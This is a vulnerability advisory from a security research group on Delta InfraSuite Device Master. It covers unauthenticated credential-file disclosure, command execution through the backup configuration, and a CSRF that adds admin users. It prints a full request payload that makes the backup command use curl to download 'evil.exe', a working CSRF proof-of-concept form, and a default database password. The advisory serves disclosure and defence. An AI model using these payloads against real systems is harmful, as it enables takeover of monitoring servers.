Resources > research

RBS-2022-002 – Delta Infrasuite Device Master

A function that handles GET requests does not enforce any authentication and allows to request any file e.g. in the infrasuitemanager/ApRunning/ directory. This allows accessing the UserInfoList.xml or Gateway.xml files, which include user credentials.

Delta Infrasuite Device Master – Multiple Vulnerabilities

Vendor / Product information

“InfraSuite Device Master provides a rich set of capabilities that simplify and automate critical device monitoring. It allows users to observe the status of all devices, query event logs or history data, and assists users in taking appropriate action. With cost effective deployment, this software solution is scalable to match your business growth.”


Vulnerable program details

Tested products and version:

Vendor: Delta Power Solutions
Product: InfraSuite Device Master
Version: 00.00.01a


Sven Krewitt, Flashpoint

Vulnerability details

The application provides a web interface to view the status and data of monitored devices on a web page. The documentation refers to this interface as the Web Monitor. This interface is affected by the following vulnerabilities.

WebEngineHandler::WebServerCallBack() Function Missing Authentication Remote Credential Disclosure

Requests to the web interface are handled in the WebEngineHandler::WebServerCallBack() function in ControlLayer.dll. The function parses incoming requests and invokes different functions depending on the request method and path.

When handling GET requests, the function does not enforce any authentication and allows to request any file e.g. in the infrasuitemanager/ApRunning/ directory. 

This allows accessing the UserInfoList.xml or Gateway.xml files, which include user credentials.


<?xml version="1.0"?>
<XMLUserInfo xmlns:xsd="" xmlns:xsi="">
     <password>cGFzc3dvcmQ=</password> //base64-encoded “password”


<?xml version="1.0"?>
<XMLControlServerData xmlns:xsd="" xmlns:xsi="">
   <ipAddress />
   <portList />
   <ipAddress />
   <portList />

The disclosure of the Administrator account password grants an attacker access to the web interface.

/infrasuitemanager/runningconfigure/configgateway.xml Endpoint Remote Command Execution

An administrative user can make minor configuration changes via the /infrasuitemanager/runningconfigure/configgateway.xml endpoint. The web interface limits this to changing preferences and configuring web server ports.

However, based on the XML contents in the respective HTTP request, other configuration options can be changed as well. This allows e.g. to enable the database backup option and to change the backup command and argument to arbitrary values. An attacker can configure a backup command that downloads and executes arbitrary files with privileges of the ‘infrasuite’ user.

Decoded request payload:

xml=<CtrlLayerNWCommand_Gateway+xmlns:xsi=""+xmlns:xsd=""><i16OperationUserID>0</i16OperationUserID><i32SubCommand>2</i32SubCommand><configData><sNewServerData><title>Gateway_Server</title><sPriNetSetting><ipAddress></ipAddress><portList /></sPriNetSetting><sSecNetSetting><ipAddress></ipAddress><portList /></sSecNetSetting><sStorageSetting><dbType>Postgres</dbType><dataSource>PostgreSQL35W</dataSource><account>postgres</account><password>xEms3000!</password><period>60</period><enableThresholdToSaveData>false</enableThresholdToSaveData></sStorageSetting><sWebConfig><webRoot>Web</webRoot><bEnableHTTP>true</bEnableHTTP><bEnableHTTPS>true</bEnableHTTPS><i32HTTPPort>80</i32HTTPPort><i32HTTPSPort>443</i32HTTPSPort></sWebConfig><backupInfo><BackupInfoDatabase><Enable>true</Enable><PeriodType>Daily</PeriodType><Path>C:\tmpbackup</Path><ActionTime>2022-08-15T05:52:00</ActionTime><IsNetworkDrive>false</IsNetworkDrive><NetworkDriveSetting><RemotePath /><Account /><Password /></NetworkDriveSetting><ExeCommand>C:\Windows\System32\curl.exe</ExeCommand><ExeArguments>-o+C:\evil.exe+</ExeArguments></BackupInfoDatabase><BackupInfoProjectFile><Enable>false</Enable><PeriodType>Monthly</PeriodType><Path /><IsNetworkDrive>false</IsNetworkDrive><NetworkDriveSetting><RemotePath /><Account /><Password /></NetworkDriveSetting><ActionTime>2016-12-14T14:00:00-08:00</ActionTime></BackupInfoProjectFile></backupInfo></sNewServerData></configData></CtrlLayerNWCommand_Gateway>

Web Interface User Creation CSRF

The web interface is affected by a cross-site request forgery (CSRF) vulnerability as performing sensitive actions do not require multiple steps, explicit confirmation, or a unique token. By tricking a user into following a specially crafted link, an attacker can cause the victim’s browser to send a request to the web interface that creates a new administrative user.


 <script>history.pushState('', '', '/')</script>
   <form action="" method="POST">
     <input type="hidden" name="opUserID" value="0" />
     <input type="hidden" name="Account" value="test2" />
     <input type="hidden" name="Password" value="123qwe" />
     <input type="hidden" name="Name" value="" />
     <input type="hidden" name="Department" value="" />
     <input type="hidden" name="Company" value="" />
     <input type="hidden" name="Professional" value="Service" />
     <input type="hidden" name="JobNumber" value="" />
     <input type="hidden" name="HomePhone" value="" />
     <input type="hidden" name="OfficePhone" value="" />
     <input type="hidden" name="PriMobilePhone" value="" />
     <input type="hidden" name="SecMobilePhone" value="" />
     <input type="hidden" name="PriEmail" value="" />
     <input type="hidden" name="SecEmail" value="" />
     <input type="hidden" name="Remark" value="" />
     <input type="hidden" name="EnabledStatus" value="1" />
     <input type="hidden" name="DoorAccessVerifyID" value="" />
     <input type="submit" value="Submit request" />


Disable or restrict network access to the web interface.


VulnDB: 298295, 298296, 298297


2022-07-15: Initial contact per email
2022-07-21: Contact via web form
2022-08-01: Sent reminder
2022-08-08: Sent final notice via email and web form
2022-08-15: Disclosure